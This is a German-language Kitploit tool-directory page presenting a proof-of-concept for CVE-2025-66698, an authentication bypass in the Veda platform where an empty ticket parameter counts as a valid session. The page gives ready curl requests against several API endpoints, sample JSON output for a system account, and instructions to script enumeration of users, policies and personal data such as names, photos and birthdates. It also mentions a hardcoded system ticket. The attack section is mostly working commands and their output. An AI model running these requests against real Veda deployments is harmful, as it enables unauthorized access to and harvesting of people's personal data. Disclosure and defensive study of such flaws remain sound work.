Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/perunchess/cve-2025-66698
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungAuthentifizierung
GitHubperunchess/cve-2025-66698

CVE-2025-66698

Proof-of-Concept für CVE-2025-66698: Authentifizierungsumgehung in Veda v5.4.8 über einen leeren Ticket-Parameter, die Aufzählung von Benutzern, Richtlinien und PII über nicht authentifizierte API-Endpunkte ermöglicht.

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-66698

Zielsoftware: Veda (Semantic Machines) v5.4.8 (wahrscheinlich alle früheren Versionen). Schwachstellentyp: Authentifizierungsumgehung. CVE-ID: CVE-2025-66698. Zusammenfassung: Das System validiert den Ticket-Parameter nicht ordnungsgemäß und behandelt eine leere Zeichenfolge als gültige Sitzung. Projekt-Link: Veda (Semantic Machines)

  1. November 2025: Entdeckung und erste CVE-Anfrage.
  2. Januar 2026: CVE-ID zugewiesen. Versuch, den Anbieter zu kontaktieren (ignoriert und gelöscht).
  3. Januar 2026: Öffentliche Offenlegung aufgrund fehlender Reaktion des Anbieters.

Diese Schwachstelle wurde während meiner Sicherheitsforschung bei der Überprüfung des Codes gefunden. Der Ticket-Parameter im Code prüft nicht auf leere Werte.

Einige betroffene API-Endpunkte:

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k (gibt "true" zurück)

Es gibt viele Standardbenutzer, die Sie enumerieren können, und Sie können das Schema ändern: cfg zu v-s usw., um Benutzer, Richtlinien, PII (vollständige Namen, Fotografien, Berufsbezeichnungen, Geburtsdaten und Kontaktinformationen) usw. zu enumerieren.

root@kitploit:~
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
root@kitploit:~
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

Was Sie tun müssen, ist, immer mehr dieser Entitäten "xxx:xxx" (cfg:xxx, v-s:xxx usw.) zu finden. Sie können ein einfaches Bash-Skript dafür schreiben. Es gibt auch ein hartcodiertes systicket, um das gleiche Ergebnis zu erzielen.

CVSS-Bewertung:

  • CVSS 3.1 Vektor: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Bewertung: 8.6 (Hoch)
  • CVSS 4.0 Vektor: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Bewertung: 9.3 (Kritisch)
Tool herunterladen